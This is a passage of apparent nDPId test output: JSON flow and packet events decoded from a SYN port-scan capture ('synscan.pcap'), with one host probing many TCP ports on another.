-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsbSgAADkGokqsEAAIQA2GNIzTC7bdU4MZAAAAAGACCAAk1gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsGhwAADYG+FasEAAIQA2GNIzTgAbdU4MZAAAAAGACDACshQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs9osAADAGIeesEAAIQA2GNIzTBB3dU4MZAAAAAGACBAAwbwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs+cAAADsGE7KsEAAIQA2GNIzTHCHdU4MZAAAAAGACEAAMawAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsIVwAADQG8xasEAAIQA2GNIzTF9rdU4MZAAAAAGACBAAcsgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAszS8AACYGVUOsEAAIQA2GNIzTI1rdU4MZAAAAAGACDAAJMgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsE4oAACwGCOmsEAAIQA2GNIzTEPfdU4MZAAAAAGACBAAjlQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAscS4AADIGpUSsEAAIQA2GNIzTH0ndU4MZAAAAAGACDAANQwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsB1sAACgGGRisEAAIQA2GNIzTBR3dU4MZAAAAAGACBAAvbwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsAs8AADoGC6SsEAAIQA2GNIzTAFPdU4MZAAAAAGACDAAsOQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBUAACkG612sEAAIQA2GNIzT1DjdU4MZAAAAAGACCABcUwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ5MAADsGpd+sEAAIQA2GNIzTEWHdU4MZAAAAAGACEAAXKwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AAC8GIcSsEAAIQA2GNIzTG1ndU4MZAAAAAGACEAANMwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsC84AAC0GD6WsEAAIQA2GNIzTJ8TdU4MZAAAAAGACCAAIyAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsHuYAADAG+YysEAAIQA2GNIzTDwvdU4MZAAAAAGACBAAlgQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsD7cAADgGALysEAAIQA2GNIzTG7zdU4MZAAAAAGACBAAY0AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAspxIAAC0GdGCsEAAIQA2GNIzSBMLdUoMYAAAAAGACCAArzQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsBn4AACYGG\/WsEAAIQA2GNIzSS3PdUoMYAAAAAGACDADhGwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAs43YAACwGOPysEAAIQA2GNIzSTYLdUoMYAAAAAGACBADnDAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsg1oAAC4GlxisEAAIQA2GNIzSDdrdUoMYAAAAAGACDAAetQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsI3IAAC4G9wCsEAAIQA2GNIzSBD7dUoMYAAAAAGACDAAoUQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAstG0AADoGWgWsEAAIQA2GNIzSBBzdUoMYAAAAAGACDAAocwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAssh8AAC8GZ1OsEAAIQA2GNIzSD5vdUoMYAAAAAGACEAAY9AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsqVsAACsGdBesEAAIQA2GNIzSEyTdUoMYAAAAAGACEAAVawAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAshXIAADcGjACsEAAIQA2GNIzSdTDdUoMYAAAAAGACEACzXgAAAgQFtA=="} 